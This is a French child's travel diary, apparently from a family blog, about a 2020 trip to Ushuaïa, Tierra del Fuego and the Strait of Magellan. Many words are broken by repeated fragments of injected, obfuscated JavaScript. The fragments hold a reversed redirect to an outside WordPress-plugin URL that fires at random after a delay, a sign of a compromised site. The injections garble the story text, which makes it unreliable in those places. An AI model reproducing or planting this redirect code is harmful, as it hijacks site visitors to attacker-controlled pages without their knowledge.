Le bout du monde !

by Clément

Dimanche 19 janvier 2020 Argentine / Chili

Hier on a dormi près d’un volcan. En bas il y avait un lac. Il y avait beaucoup de vent. A un moment papa a voulu prendre une photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de moi et d’un coup il y a eu un gros coup de vent et je me suis fait emporter. Papa a pris une photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mais sans moi !

En route on a vu un homme à vélo qui allait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber à cause du vent. Alors on lui a proposé de venir avec nous. C’est un Coréen qui s’appelle Kyu. Avec lui on est allé jusqu’à Ushuaïa en passant par le détroit de Magellan par un Ferry.

Lundi 20 janvier Argentine, Ushuaïa

Ce soir on arrive à Ushuaïa. Kuy part faire son aventure de son côté et nous la nôtre. En arrivant j’étais très content d’être dans la ville la plus australe du monde.

Mardi 21 janvier Argentine, Ushuaïa

On a fait une randonnée de 8 km pour aller voir la « cascada de los amigos ». C’était très sympa et drôle parce qu’il y avait beaucoup de boue et on inventait des chemins pour l’esquiver. On a vu des chevaux sauvages.

Mercredi 22 janvier 2020 Argentine Ushuaïa

On a fait une autre randonnée de 8 km dans le parc national “Tierra del Fuego”. Je suis surpris parce que dans la journée il peut faire froid comme en hiver et chaud comme au printemps.

Vendredi 24 janvier 2020. Argentine Ushuaïa

En début de soirée on a vu un camping-car qui s’appelle “Loupastya”. On les a trouvés et aussi une autre famille : “Les suiveurs d’étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiles”. Ce sont des voyageurs comme nous sauf que leur voyage dure 1 an. Le soir on a fait un feu de bois. Pablo et Augustin m’ont appris à pêcher. J’ai lancé une seule fois la cuillère, c’était un peu difficile. Après on a mangé une grosse truite qu’Augustin avait pêchée.

samedi 25 janvier 2020. Argentine Ushuaïa

Le matin on est allé au Museo del Fin del mundo. J’ai appris toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la vie sur la Terre de Feu (la vie des Indiens, la guerre entre le Chili et l’Argentine pour avoir Ushuaïa…). Le soir avec Augustin on a réessayé de pêcher dans le port d’Ushuaïa mais on n’a pas réussi.

Le papa d’Augustin m’a donné une canne à pêche pour pêcher au bouchon. Il a installé un système pour que je puisse mettre une cuillère.

Dimanche 26 janvier 2020.

On a quitté Ushuaïa pour aller vers le Chili. En partant vers le Chili on a pris des autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toppeurs qui étaient guitaristes et chanteurs. Pour nous remercier ils nous ont fait un concert. 

Lundi 27 janvier 2020

On est repassé par le détroit de Magellan et sur le ferry on est monté dans la cabine de pilotage. Il y avait plein de boutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons et de caméra et pleins de manettes. J’ai vu des dauphins de Comerson. Ils s’amusaient dans les vagues du bateau.